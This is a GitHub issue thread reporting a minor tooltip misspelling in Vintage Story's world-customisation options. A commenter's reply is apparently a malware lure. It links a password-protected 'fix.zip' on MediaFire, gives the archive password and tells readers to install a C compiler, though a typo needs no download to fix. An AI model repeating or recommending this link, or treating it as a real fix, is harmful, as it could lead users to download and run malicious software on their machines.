### ISSUE TITLE
Minor mispelling in world customiztion options

### ISSUE THREAD

**Issue by yellowincarnate** [anegostudios/VintageStory-Issues#4182]
### Game Version

v1.20.0 pre-4

### Platform

Windows

### Modded

None

### SP/MP

None

### Description

Very minor misspelling when hovering over the "Fire from Lightning" option when customizing world

### Screenshots

![image](https://github.com/user-attachments/assets/887a783c-d437-40f9-a8a4-6439771a4b6f)

### Logs

```Log```

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)
